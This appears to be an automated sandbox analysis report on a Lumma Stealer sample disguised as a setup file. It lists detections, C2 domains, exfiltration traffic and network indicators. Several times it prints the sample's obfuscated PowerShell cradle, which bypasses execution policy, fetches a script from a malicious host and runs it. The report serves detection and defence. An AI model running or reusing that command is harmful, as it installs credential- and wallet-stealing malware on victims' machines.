
Windows Analysis Report
Set-UpFile_v25.exe

Overview

General Information

Sample name: Set-UpFile_v25.exe
Analysis ID: 1585343
MD5: 2f33775c502e7b2d60b9bfe944b46863
SHA1: 57d023419ecbe81d27368757fea4366de68891ea
SHA256: fce2d6446420934b428053edf66b7cc5838717fbf67911c11145424ebd0a045b
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-UpFile_v25.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Set-UpFile_v25.exe" MD5: 2F33775C502E7B2D60B9BFE944B46863)
    • powershell.exe (PID: 7596 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Malware configuration: {"C2 url": ["cloudewahsj.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop", "beattalkerz.cyou", "framekgirus.shop", "noisycuttej.shop", "nearycrepso.shop"], "Build id": "hRjzG3--ZINA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x5151f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Set-UpFile_v25.exe PID: 7272 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Set-UpFile_v25.exe PID: 7272 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Set-UpFile_v25.exe PID: 7272 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

System Summary

Source: Process started. Six Sigma rules matched the same process-creation event; their authors, in report order:
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data (identical for all six matches): Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T14:37:11.659198+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:12.609952+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:13.913865+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:15.152429+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:16.395868+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:22.773652+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:24.415568+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:26.047768+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:28.145395+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:29.414835+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
2025-01-07T14:37:12.141741+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:13.061485+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:28.640242+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:12.141741+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:13.061485+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:24.859758+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP
2025-01-07T14:37:26.052786+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP

AV Detection

Source: https://klipvumisui.shop/int_clp_sha.txt% | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtf1R= | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop:443/int_clp_sha.txt | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtcoded | Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=user-PCx | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txt.3 | Avira URL Cloud: Label: malware
Source: Set-UpFile_v25.exe.7272.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop", "beattalkerz.cyou", "framekgirus.shop", "noisycuttej.shop", "nearycrepso.shop"], "Build id": "hRjzG3--ZINA"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.7% probability
Source: Set-UpFile_v25.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981135607.0000000006D0A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp

Networking

            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.25.52:443
            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49756 -> 104.21.25.52:443
            Source: Malware configuration extractorURLs: cloudewahsj.shop
            Source: Malware configuration extractorURLs: tirepublicerj.shop
            Source: Malware configuration extractorURLs: wholersorie.shop
            Source: Malware configuration extractorURLs: rabidcowse.shop
            Source: Malware configuration extractorURLs: abruptyopsn.shop
            Source: Malware configuration extractorURLs: beattalkerz.cyou
            Source: Malware configuration extractorURLs: framekgirus.shop
            Source: Malware configuration extractorURLs: noisycuttej.shop
            Source: Malware configuration extractorURLs: nearycrepso.shop
            Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.25.52:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 185.161.251.21:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.25.52:443
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 78
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=GEC2K66UIK1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 18120
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=0J1ENAKYSQRTU5UCL
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8777
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=B7GDPGPLHYU
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 20394
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=8Z8YAVH559VDX1P
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 7111
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=DQ9HCLZXYVNW0P7R
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 1241
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=DPCH7IOTRU
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 586472
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 113
                Host: beattalkerz.cyou
            Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Host: cegu.shop
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: beattalkerz.cyou
            Source: global traffic | DNS traffic detected: DNS query: cegu.shop
            Source: global traffic | DNS traffic detected: DNS query: klipvumisui.shop
            Source: global traffic | DNS traffic detected: DNS query: dfgh.online
            Source: unknown | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: beattalkerz.cyou

            System Summary

            Source: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Code function: 0_2_029D2D35 NtCreateSection, NtMapViewOfSection, VirtualAlloc, NtMapViewOfSection, VirtualProtect, VirtualProtect, VirtualProtect, CreateThread
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029C4DE20_2_029C4DE2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02987D120_2_02987D12
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029BD5220_2_029BD522
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298A5420_2_0298A542
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Code function: String function: 02989B12 appears 66 times
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Code function: String function: 029963D2 appears 38 times
            Source: Set-UpFile_v25.exe Static PE information: invalid certificate
            Source: Set-UpFile_v25.exe Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Set-UpFile_v25.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: Set-UpFile_v25.exe, 00000000.00000003.1767448797.000000000307A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs Set-UpFile_v25.exe
            Source: Set-UpFile_v25.exe, 00000000.00000000.1659588874.000000000051F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs Set-UpFile_v25.exe
            Source: Set-UpFile_v25.exe Binary or memory string: OriginalFilenameshfolder.dll~/ vs Set-UpFile_v25.exe
            Source: Set-UpFile_v25.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@4/2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Code function: 0_2_02980A85 CreateToolhelp32Snapshot, Thread32First, Wow64SuspendThread, CloseHandle
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1unjy0zf.ro1.ps1
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793222380.0000000003675000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792659491.00000000036A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Set-UpFile_v25.exe String found in binary or memory: -Helper process exited with failure code: 0x%x
            Source: Set-UpFile_v25.exe String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
            Source: Set-UpFile_v25.exe String found in binary or memory: /LoadInf=
            Source: Set-UpFile_v25.exe String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe File read: C:\Users\user\Desktop\Set-UpFile_v25.exe
            Source: unknown Process created: C:\Users\user\Desktop\Set-UpFile_v25.exe "C:\Users\user\Desktop\Set-UpFile_v25.exe"
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: webio.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: amsi.dll
